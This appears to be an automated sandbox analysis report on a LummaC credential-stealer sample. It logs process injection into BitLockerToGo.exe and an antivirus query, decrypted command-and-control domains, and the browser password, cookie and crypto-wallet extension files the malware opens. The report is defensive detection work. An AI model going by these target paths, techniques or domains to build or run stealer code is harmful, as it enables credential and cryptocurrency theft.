Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000002.2424627621.00000000026F6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: rykCKtzLhVlhZyZkwUQRTbonZDbJSMoCiEjovhBKJNlwQRebuQaLflPQEmUkgQCRaZmbAEtCeVnEsRcHXugkKyvkcfbSpEx
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: file.exe, 00000000.00000002.2423108104.00000000024B4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: aws-cdk-lib.cloud_assembly_schema.ArtifactMetadataEntryType/LOGICAL_IDaws-cdk-lib.cloud_assembly_schema.ArtifactMetadataEntryType/STACK_TAGSaws-cdk-lib.cloud_assembly_schema.ArtifactMetadataEntryType/ASSETaws-cdk-lib.cloud_assembly_schema.ArtifactMetadataEntryType/ERRORaws-cdk-lib.cloud_assembly_schema.ArtifactType/AWS_CLOUDFORMATION_STACKaws-cdk-lib.cloud_assembly_schema.ArtifactType/NESTED_CLOUD_ASSEMBLYaws-cdk-lib.cloud_assembly_schema.ContextProvider/LOAD_BALANCER_PROVIDERaws-cdk-lib.cloud_assembly_schema.ContextProvider/SSM_PARAMETER_PROVIDERaws-cdk-lib.cloud_assembly_schema.ContextProvider/SECURITY_GROUP_PROVIDERaws-cdk-lib.cloud_assembly_schema.ContextProvider/AVAILABILITY_ZONE_PROVIDERaws-cdk-lib.cloud_assembly_schema.ContextProvider/HOSTED_ZONE_PROVIDERaws-cdk-lib.cloud_assembly_schema.FileAssetPackaging/ZIP_DIRECTORYaws-cdk-lib.cloud_assembly_schema.LoadBalancerListenerProtocol/HTTPaws-cdk-lib.cloud_assembly_schema.LoadBalancerListenerProtocol/HTTPSaws-cdk-lib.cloud_assembly_schema.LoadBalancerListenerProtocol/TCPaws-cdk-lib.cloud_assembly_schema.LoadBalancerListenerProtocol/TLSaws-cdk-lib.cloud_assembly_schema.LoadBalancerListenerProtocol/UDPaws-cdk-lib.cloud_assembly_schema.LoadBalancerListenerProtocol/TCP_UDPaws-cdk-lib.cx_api.LoadBalancerIpAddressType/DUAL_STACK_WITHOUT_PUBLIC_IPV4coff symbols parsing failed: PE image does not contains a COFF symbol tablecoff symbols parsing failed: PE image does not contains a COFF symbol tableaQnOaGBQLPxogaEKAkoJSJbiZkdAFMMvKawoTKZBcnUjpiKqSzksXhbNyRBeQNiptqQSeMADXDrQiiLAExEJuMZdhLZukQhzCDIYOWBHFGYQYUfCXTDooZWSrnzgOwNKQAJSXURDrRsiLQmWWhhvousxrsqLliHFpVcLtZkiJLQgwTzEzOVDVcGoVRpEczzmKUbrPieCkgcBFTriPcEsXyxeSFjhKTioOTLXyupdZeztHfcCipCibIccVGisqwEDZSsRzxYRuwJgrUseeYebcsKKIPhlgHEPFauTtfOjXdkiPscoHukqPOXvSQWNBgQGrKRNavhoDZnflPNsXdmoegRfChudrDARwfkogBrhLsdrGmdbgHsfpnYuyXefoBLHMZqHRrxLOGgJvvYncuSbuJTjvgvlhWciCLvLeytWNAgRhRfJsCoSexQiSwNlICEdTsEBrWSvmldjBlrLkiyLFiHGjDtzZvWjlAigcfwajUQoIquAZNDitexhfmqRZrPBysZxhsiyyqKrJNgecEnxsauAkfGCMhtaWYWcbFpKnbfiwWajHAPBFIyrRWOSfMwrkFkqRHokJymLPqBnNIeqDIheYWAIcDbXAadheXOysDwcFmuvVMxoxmfvACMqlYlmwhpLrAoliLgZJtmnmyXrMVDcHSPbLTvYHRhsIcrNDMHZplfBzzPJXNIDpkAPPizqqGDgAWpToqPPHsGaKWgBlSmFNGdbRPOgXCvxHbMmQefVUXLfvFoysCTMOrUyDuaQTAmjKCEKxoMDsSRllvIWtMjPGpOVptArOIXrhdCnPririTJrpeHzmoaRGKtHFLctPkxnVsFfofSpDkbzZieIcLnUvKowaQKgmmvvjTEfDVWtmATeWtBAJlMOaqcpfUMrcviRNBGwztVooaBDtxVgraMVErjAlwyxVIcciIPsopDivbtuQWGBmJbiMepfXzQpQMyUkRgfTuNYjZwibXQHVvzNxcWUkFWYbsBtMrTiHcqBwjnYhvPbJGkZNKNclTYNdYVWiwZPFPAnRZqezFzosNRgcuLqWyHtcrYKALcDuWugvIxoSwNYrQADHWrgapryYphfRsiglcGJmYpPZJutxOupAMACIbOBnCqbMDXKetswNtVrLmFweywOwayHbYEUfrVrXEKNBJsEXEqNZUIBrunkKFxCtmcTYFtqyUiTqHPsNePAgboRTbhVBnMjvjovMCiAHgtfRdtPyLnGFPRfkFYVyfbYdlWdNCIgAXTtViwIuKYGbCLTUICMwISapgeteIkDanvjklMIOpcxknkCbEHnkIzntjzwuTMLuPQkJYXoCKChZprhrPnVhfJUwJyCMTCxfXDGHkpXbGmFvradvYVtUsKNPPdAgpTjjNFWfuZWdeaRWAyGKlyziIhZJxHmxhZNLBViFgWIkdAeeZJMrfiKQJAKIcVTmIwGBEOWjDfkMyxVctZQxQLQiyqWeDtuaGHXXJdwAqaBsvbhsxgaDZlJxiisVAndlpeykLlSDxdNraDtaLmQybNPvxhXTK
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_00440D90 LdrInitializeThunk,

2_2_00440D90

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: file.exe, 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: servicedny.site
Source: file.exe, 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: authorisev.site
Source: file.exe, 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: faulteyotk.site
Source: file.exe, 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: dilemmadu.site
Source: file.exe, 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: contemteny.site
Source: file.exe, 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: goalyfeastz.site
Source: file.exe, 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: opposezmny.site
Source: file.exe, 00000000.00000002.2423108104.000000000253E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: seallysl.site

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C56008	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 446000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 449000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 459000	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3060, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: BitLockerToGo.exe, 00000002.00000003.2470968810.000000000301C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: BitLockerToGo.exe, 00000002.00000003.2470968810.000000000301C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: file.exe, 00000000.00000002.2423108104.000000000250A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: NFZHpqTmaOsBBpBeapJeBTnyoeTfuowLhRZlEjMUMvnyvqoaHOFnWruMlSvabXVCpYkbvSmIsJXSuMKqTVKyxbxjaxxagKGSim
Source: BitLockerToGo.exe, 00000002.00000003.2470968810.000000000301C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000002.00000003.2470652028.000000000301B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs
Source: BitLockerToGo.exe, 00000002.00000003.2470968810.000000000301C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: BitLockerToGo.exe, 00000002.00000003.2470968810.000000000301C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: BitLockerToGo.exe, 00000002.00000003.2470968810.000000000301C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: BitLockerToGo.exe, 00000002.00000003.2470968810.000000000301C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
